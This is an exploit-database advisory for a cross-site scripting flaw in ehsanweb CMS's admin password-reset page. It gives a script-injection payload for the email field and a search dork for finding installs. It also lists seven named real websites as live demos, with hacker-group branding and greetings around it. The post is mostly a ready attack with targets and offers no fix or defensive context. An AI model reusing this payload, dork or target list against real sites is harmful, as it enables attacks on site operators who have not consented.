Cross-Site Scripting Vulnerability in ehsanweb CMS

--



*** Iranian Exploit DataBase ***

*            ** http://iedb.ir <http://exploit.iedb.ir> ***

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@
 @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@
 @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@
 @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@
 @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@
 @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@
 @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@
 @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@
 @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@
 @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# ehsanweb CMS Cross-Site Scripting Vulnerability

# Vendor site : http://www.ehsanweb.com

# Dork : "????? ? ?????? ?????: ????? ??"

# Author : IeDb

# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir

# Fb Page : https://www.facebook.com/iedb.ir

#####################################

Bug :

http://www.site.com/admin/forgetpassword.php

POST :

email="><script>alert(/amir/)</script>

Image : http://upload.tehran98.com/upme/uploads/1ed2e1296fe441df1.jpg

Dem0 :

http://www.ehsanweb.com/admin/forgetpassword.php?process
http://pgshco.com/admin/forgetpassword.php?process
http://www.sapno.ir/admin/forgetpassword.php?process
http://abzarmajid.com/admin/forgetpassword.php?process
http://www.danavc.com/admin/forgetpassword.php?process
http://lotuscard.ir/admin/forgetpassword.php?process
http://www.asregorgan.ir/admin/forgetpassword.php?process

#####################################

# Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - Bl4ck N3T - dr.koderz -
 Enddo - E1.Coders - Behnam Vanda

# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil -
 z3r0 - 0x0ptim0us - 0Day

# Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar
 shahinzadeh - Khashayar

#  tootro20 - AmirMasoud And All Members In IeDb.Ir/acc

#####################################

#  Archive Exploit = http://www.iedb.ir/exploits-1903.html

#####################################